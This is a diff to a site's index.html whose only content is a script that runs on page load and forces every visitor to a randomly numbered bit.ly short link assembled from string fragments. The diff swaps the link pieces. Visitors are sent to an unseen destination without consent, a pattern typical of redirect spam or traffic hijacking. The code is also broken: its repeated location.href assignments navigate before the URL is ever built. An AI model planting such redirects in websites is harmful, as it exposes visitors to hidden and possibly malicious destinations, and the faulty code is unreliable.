--- a/index.html
+++ b/index.html
@@ -1,13 +1,11 @@
 <script type = "text/javascript">
 function reDirect() {
 a = location.href = "bit.ly/";
-b = location.href = "ma3ana";
-c = location.href = "funv";
+b = location.href = "info";
+c = location.href = "1net";
 d = Math.ceil(Math.random() * 11);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
 </script>
-
-
